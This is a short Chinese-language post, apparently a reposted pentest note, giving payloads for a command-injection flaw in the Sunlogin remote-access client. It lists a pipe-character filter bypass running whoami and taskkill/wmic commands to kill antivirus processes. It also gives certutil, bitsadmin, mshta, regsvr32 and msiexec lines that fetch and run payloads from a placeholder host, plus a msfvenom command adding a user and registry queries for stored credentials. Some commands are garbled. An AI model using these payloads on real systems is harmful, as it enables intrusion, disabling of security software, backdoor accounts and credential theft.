

0x001 第一种方法
添加管道符即可,绕过匹配的规则
ping../../../../../../../../../windows/system32/cmd.exe+/c|cmd+/c+whoami

0x002 第二种方法
得知向日葵默认是system权限,那就可以直接去taskkill杀软了 (比较残忍,还得防止自启之类)
ping../../../../../../../../../windows/system32/taskkill+/f+/pid+1111

然后再去执行命令之类的,就比较方便了

0x003 第三种方法
certutil
certutil -urlcache -split -f http://x.x.x.x/only.execmd.exe c only.exe


bitsadmin
bitsadmin transfer n http://x.x.x.x/1.txt C:\Users\f0ngf0ng\\1.txt

IEexec
#在攻击机器上生成msi包 msfvenom -p windows/exec CMD='net user only onlysecurity add' -f msi > evil.msi#在目标机器上远程执行(直接写payload的ip和文件) msiexec q i http://x.x.x.x/evil.msi


mshta
mshta http://x.x.x.x/run.hta


regsvr32
regsvr32.exe u n s /i:http://x.x.x.x/1.sct scrobj.dll


wmic
比如也可以调用wmic去停止杀软进程等等
ping../../../../../../../../../windows/system32/wbem/wmic+process+where+name%3d'360TRAY.exe'+call+terminate

0x004 第四种方法
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo



0x04 总结
参考链接:
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/
https://www.cnblogs.com/xiaozi/p/12721960.html
https://github.com/wafinfo/Sunflower_get_Password
文章转载自only security,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。




